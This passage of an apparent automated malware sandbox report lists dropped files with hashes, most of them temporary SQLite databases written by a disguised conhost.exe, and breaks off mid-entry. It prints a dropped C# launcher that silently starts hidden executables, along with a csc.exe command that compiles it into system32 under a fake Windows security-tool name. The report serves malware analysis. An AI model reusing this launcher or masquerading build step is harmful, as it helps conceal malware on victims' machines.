                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tNVv3dMcbu

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tZ78MruFmP

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.0.cs

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):397
                                                          Entropy (8bit):5.042329619595704
                                                          Encrypted:false
                                                          SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLnD4k1HiFkD:JNVQIbSfhV7TiFkMSfhH1CFkD
                                                          MD5:3EAB9912467A24F1E0B2460427CF2C76
                                                          SHA1:A831D4106A042EBB2F79E1724A50B9AD8FE9914A
                                                          SHA-256:2ABE04B8E0D9D821231EF9AFE73F9FCF7F1D83B526A22C5EF5197B234C6018E5
                                                          SHA-512:2EAA2EA686B185655F9D90C9A76FFEE02731ABE094EDAFB401C317387E4C69D3EAFA7BC23437F282E068B38A59E9811BB7EFAE81C65F55ED125A8E3ADF79F064
                                                          Malicious:false
                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"); } catch { } }).Start();. }.}.

                                                          C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.cmdline

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):253
                                                          Entropy (8bit):5.0366325151923865
                                                          Encrypted:false
                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oN723fZM6zM6P:Hu7L//TRq79cQnaqDa
                                                          MD5:A24332364785B7C3A861E139F0DDB2A2
                                                          SHA1:9B8144DE0E0CE83E37660699D3CF6DAB61BB6B5B
                                                          SHA-256:5B0D170E6EC561E911F0983436894DE40039B36F42255A19D0DB339E04F80D17
                                                          SHA-512:D44186C8C51F565D99A1B3214945B45228934C565A411A229894742F54C40549F5042BD050322A7E046AA0A15EDA80356273EC4E1BD93364CFB59B35609823E6
                                                          Malicious:false
                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.out

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (325), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):746
                                                          Entropy (8bit):5.233537574556322
                                                          Encrypted:false
                                                          SSDEEP:12:zI/u7L//TRq79cQnaqDTKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zI/un/Vq79tnaqDTKax5DqBVKVrdFAMb
                                                          MD5:193E047EC9EEE57A644251FBF8D0769E
                                                          SHA1:C404CBD1F008300E2EC8D0B54C55B764C1C5B731
                                                          SHA-256:CA10AFF1542DCD77AA5E8E94B56054AC5F20E6998EF8019BDD11530C693BCE59
                                                          SHA-512:091B78EA2D14E545EEA3D5552B241BBC33FD1F1AFCDD7239AC0E78EE0BB4DF206051DA9B397015E3F673B4279A97197AF21A8B56EB7E4E8976DFDD441E036870
                                                          Malicious:false
                                                          Preview:.C:\blockhostnet> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                          C:\Users\user\AppData\Local\Temp\tmlGOQoRe1

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\toL4r4u6Eo

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\u0VHRtdnUD

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\u7cJv2xbXB

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\uHJ3LU8Rq2

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\uLOcB8Fjvq

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\uRCQmSSpT4

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\uZ6lA9XmoJ

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\uyPzPggcgy

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\v9809xfPvp

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\w255U3kdbR

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\w6BjO9jd6l

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\wEHCT33DJm

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\wQ5uk0sHqU

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\wQGTEPWHw7

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\wV48f1Blat

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\wa5FzuMjZ9

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\x1GDgPwVXk

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\x2sMQXDUeq

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
